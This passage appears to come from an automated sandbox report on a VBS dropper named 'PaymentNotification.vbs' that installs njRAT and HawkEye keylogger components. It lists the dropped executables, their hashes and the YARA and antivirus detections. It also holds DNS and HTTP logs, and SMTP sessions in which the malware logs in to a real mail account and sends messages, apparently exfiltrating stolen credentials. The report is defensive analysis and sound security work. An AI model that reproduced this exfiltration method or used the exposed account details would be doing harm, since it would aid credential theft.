                                                                                              Apr 28, 2021 20:50:57.249634027 CEST8.8.8.8192.168.2.60xb64bNo error (0)neesoontat.com.my103.6.196.196A (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:51:08.224945068 CEST8.8.8.8192.168.2.60xaf62No error (0)mail.neesoontat.com.myneesoontat.com.myCNAME (Canonical name)IN (0x0001)
                                                                                              Apr 28, 2021 20:51:08.224945068 CEST8.8.8.8192.168.2.60xaf62No error (0)neesoontat.com.my103.6.196.196A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • whatismyipaddress.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.649724104.16.154.3680C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Apr 28, 2021 20:50:55.668230057 CEST884OUTGET / HTTP/1.1
                                                                                              Host: whatismyipaddress.com
                                                                                              Connection: Keep-Alive
                                                                                              Apr 28, 2021 20:50:55.724474907 CEST885INHTTP/1.1 403 Forbidden
                                                                                              Date: Wed, 28 Apr 2021 18:50:55 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 16
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Set-Cookie: __cfduid=d2d801be5ab4d384e31a0cda7ace565511619635855; expires=Fri, 28-May-21 18:50:55 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                                                              cf-request-id: 09bb6af95500004a972c89b000000001
                                                                                              Set-Cookie: __cf_bm=cd9f7279d4ed65a28ab854fe93b197ab0083d204-1619635855-1800-AblRiLN8v8jUSsX1yzccj9OeQvb0d3FKoY8GAZLX4uSW/L/oF2ywsEqLg0ZLpTxPl4rXemFqIaXQ+XvEMkDodH8=; path=/; expires=Wed, 28-Apr-21 19:20:55 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 64727aa229f04a97-FRA
                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                              Data Ascii: error code: 1020


                                                                                              HTTPS Packets

                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                              Apr 28, 2021 20:49:38.428610086 CEST207.241.227.114443192.168.2.649699CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                              CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                              CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                              OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                              SMTP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Apr 28, 2021 20:50:58.251331091 CEST58749726103.6.196.196192.168.2.6220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:50:57 +0800
                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                              220 and/or bulk e-mail.
                                                                                              Apr 28, 2021 20:50:58.251832962 CEST49726587192.168.2.6103.6.196.196EHLO 965969
                                                                                              Apr 28, 2021 20:50:58.532615900 CEST58749726103.6.196.196192.168.2.6250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3]
                                                                                              250-SIZE 52428800
                                                                                              250-8BITMIME
                                                                                              250-PIPELINING
                                                                                              250-X_PIPE_CONNECT
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-STARTTLS
                                                                                              250 HELP
                                                                                              Apr 28, 2021 20:50:58.533673048 CEST49726587192.168.2.6103.6.196.196AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
                                                                                              Apr 28, 2021 20:50:58.815630913 CEST58749726103.6.196.196192.168.2.6334 UGFzc3dvcmQ6
                                                                                              Apr 28, 2021 20:50:59.104113102 CEST58749726103.6.196.196192.168.2.6235 Authentication succeeded
                                                                                              Apr 28, 2021 20:50:59.104830980 CEST49726587192.168.2.6103.6.196.196MAIL FROM:<ts.lee@neesoontat.com.my>
                                                                                              Apr 28, 2021 20:50:59.385138035 CEST58749726103.6.196.196192.168.2.6250 OK
                                                                                              Apr 28, 2021 20:50:59.385399103 CEST49726587192.168.2.6103.6.196.196RCPT TO:<ts.lee@neesoontat.com.my>
                                                                                              Apr 28, 2021 20:50:59.668490887 CEST58749726103.6.196.196192.168.2.6250 Accepted
                                                                                              Apr 28, 2021 20:50:59.669125080 CEST49726587192.168.2.6103.6.196.196DATA
                                                                                              Apr 28, 2021 20:50:59.950777054 CEST58749726103.6.196.196192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                                              Apr 28, 2021 20:51:00.275790930 CEST49726587192.168.2.6103.6.196.196.
                                                                                              Apr 28, 2021 20:51:00.559552908 CEST58749726103.6.196.196192.168.2.6250 OK id=1lbpH2-009Fqm-2D
                                                                                              Apr 28, 2021 20:51:09.105494976 CEST58749732103.6.196.196192.168.2.6220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:51:08 +0800
                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                              220 and/or bulk e-mail.
                                                                                              Apr 28, 2021 20:51:09.106009960 CEST49732587192.168.2.6103.6.196.196EHLO 965969
                                                                                              Apr 28, 2021 20:51:09.398216009 CEST58749732103.6.196.196192.168.2.6250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3]
                                                                                              250-SIZE 52428800
                                                                                              250-8BITMIME
                                                                                              250-PIPELINING
                                                                                              250-X_PIPE_CONNECT
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-STARTTLS
                                                                                              250 HELP
                                                                                              Apr 28, 2021 20:51:09.398889065 CEST49732587192.168.2.6103.6.196.196AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
                                                                                              Apr 28, 2021 20:51:09.691092968 CEST58749732103.6.196.196192.168.2.6334 UGFzc3dvcmQ6
                                                                                              Apr 28, 2021 20:51:09.995273113 CEST58749732103.6.196.196192.168.2.6235 Authentication succeeded
                                                                                              Apr 28, 2021 20:51:09.995539904 CEST49732587192.168.2.6103.6.196.196MAIL FROM:<ts.lee@neesoontat.com.my>
                                                                                              Apr 28, 2021 20:51:10.287507057 CEST58749732103.6.196.196192.168.2.6250 OK
                                                                                              Apr 28, 2021 20:51:10.287853956 CEST49732587192.168.2.6103.6.196.196RCPT TO:<ts.lee@neesoontat.com.my>
                                                                                              Apr 28, 2021 20:51:10.582817078 CEST58749732103.6.196.196192.168.2.6250 Accepted
                                                                                              Apr 28, 2021 20:51:10.583074093 CEST49732587192.168.2.6103.6.196.196DATA
                                                                                              Apr 28, 2021 20:51:10.876995087 CEST58749732103.6.196.196192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                                              Apr 28, 2021 20:51:10.877901077 CEST49732587192.168.2.6103.6.196.196.
                                                                                              Apr 28, 2021 20:51:11.178523064 CEST58749732103.6.196.196192.168.2.6250 OK id=1lbpHC-009G1g-Vi

                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:20:49:34
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
                                                                                              Imagebase:0x7ff73ad40000
                                                                                              File size:163840 bytes
                                                                                              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:49:45
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\Tmp.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\Tmp.exe'
                                                                                              Imagebase:0x1d0000
                                                                                              File size:69632 bytes
                                                                                              MD5 hash:9B30598F8F05C46F8ABB22A4C2ABCC9E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 78%, Metadefender, Browse
                                                                                              • Detection: 83%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:49:48
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\pgr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\pgr.exe'
                                                                                              Imagebase:0x80000
                                                                                              File size:24064 bytes
                                                                                              MD5 hash:A08F2FAC257ABBBDDDBBD4439F32CFD0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 91%, Metadefender, Browse
                                                                                              • Detection: 91%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:49:49
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\servieda.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Users\user\AppData\Roaming\servieda.exe'
                                                                                              Imagebase:0xa0000
                                                                                              File size:69632 bytes
                                                                                              MD5 hash:9B30598F8F05C46F8ABB22A4C2ABCC9E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security
